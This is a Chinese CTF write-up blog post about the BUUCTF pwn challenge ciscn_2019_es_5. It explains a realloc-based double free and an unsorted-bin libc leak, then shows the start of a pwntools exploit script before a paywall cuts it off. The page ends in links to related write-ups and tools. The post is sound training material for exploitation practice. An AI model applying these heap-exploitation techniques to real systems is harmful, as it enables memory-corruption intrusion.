BUUCTF-PWN刷题记录-16

最新推荐文章于 2024-02-06 18:08:40 发布
最新推荐文章于 2024-02-06 18:08:40 发布
阅读量715 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: BUUCTF pwn tcache realloc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/105842984
版权

目录

ciscn_2019_es_5(realloc double free)

在这里插入图片描述
申请没有大小限制,数目上限为10
在这里插入图片描述

在这里插入图片描述
edit会调用realloc重新申请(其实不会的,因为大小不变)
在这里插入图片描述
如果edit就不能show了
在这里插入图片描述
看了一下这题没有什么明显漏洞,但是考虑到realloc这里比较特别,这里再贴一下realloc用法

size == 0 ,这个时候等同于free
realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
malloc_usable_size(realloc_ptr) < szie, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉

如果我们malloc(0),内存管理器仍然会给我们一个0x20大小的chunk,但是如果到了realloc它就会被释放了,然后我们再delete它就造成了double free

然后就是泄露libc,因为没有大小限制,我们申请一个大一点的chunk,释放后进入unsorted bin,然后malloc(8),这样会切割unsorted bin,之后show()就能泄露main_arena+1168的地址了

Exp:

from pwn import *

r = remote("node3.buuoj.cn", 28564)
#r = process("./ciscn_2019_es_5")

context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''	
	b *$rebase(0x103B)
	x/10gx $rebase(0x202060)
	c
	''')

elf = ELF("./ciscn_2019_es_5")
libc = ELF('./libc/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]

menu = "Your choice:"
def add(size, content):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("size?>")
	r.sendline(str(size))
	r.recvuntil("content:")
	r.sendline(content)

def delete(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Index:")
	r.sendline(str(index))

def show(index):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Index:")
	r.sendline(str(index))

def edit(index, content, re=True):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Index:")
	r.sendline(str
最低0.47元/天 解锁文章
L.o.W
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-PWN刷题记录-17
weixin_44145820的博客
05-06 708
目录nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) 添加没有太大限制,但是会把之前内容清空 删除没有指针悬挂,并且没有show功能 edit有一个off-by-null 利用思路 因为本题的memset清0使得题目变得复杂了一点 进行4次a...
ciscn_2019_es_5(realloc(ptr,0)会free掉ptr并返回0)
seaaseesa的博客
05-01 488
ciscn_2019_es_5 首先,检查一下的保护机制 然后,我们用IDA分析一下 Create的时候,没有检查size,因此size可以为0 Edit的时候,调用了realloc,并且没有检查size是否为0,如果为0,则这个chunk会被free掉,但是堆指针没有从flist堆数组里移除,这就造成了UAF。 #coding:utf8 from pwn import *...
BUUCTFpwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
BUUCTF-PWN
weixin_52125240的博客
12-04 1729
BUUCTF-PWN1.test_your_nc2.rip3.warmup_csaw_20164.ciscn_2019_n_15.pwn1_sctf_2016 1.test_your_nc 根据名字的提示,来测试一下我们的nc cat flag 得到我们的flag nc的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目&
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
BUUCTF pwn
L0g1c的博客
01-30 1596
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
buuctfpwn
个人笔记
04-04 2666
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
BUUCTF PWN方向 1-6题 详解wp
最新发布
qq_62564422的博客
02-06 1403
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1044
buuctf pwn
buuctf习题pwn(2~10)
yw__y的博客
03-30 958
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 863
这只是个人笔记,buuctf刷题的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4928
BUU CTF PWN 入门知识详解
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 1878
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值